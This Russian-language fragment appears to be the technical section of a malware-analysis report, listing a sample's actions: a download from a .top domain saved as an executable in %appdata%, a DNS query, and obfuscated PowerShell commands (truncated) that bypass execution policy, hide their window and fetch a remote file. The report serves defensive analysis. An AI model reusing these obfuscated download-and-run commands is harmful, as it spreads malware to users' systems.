Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oW^ERs^hElL^.^e^xe^ ^-eX^ECUtioNPoLICy^ ^By^paS^S^ -nOpr^o^F^IlE^ -W^I^N^DoWsT^yl^e^ hIDd^EN ^(n^e^W-^O^BJ^Ect S^YStE^M.^NE^T.W^ebcli^eNt).DoW^N^LO^A^d^fI^lE^('http://www.door...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "p^oW^ERs^hElL^.^e^xe^ ^-eX^ECUtioNPoLICy^ ^By^paS^S^ -nOpr^o^F^IlE^ -W^I^N^DoWsT^yl^e^ hIDd^EN ^(n^e^W-^O^BJ^Ect S^YStE^M.^NE^T.W^ebcli^eNt).DoW^N^LO^A^d^fI^lE^('http://www.door...' (со скрытым окном)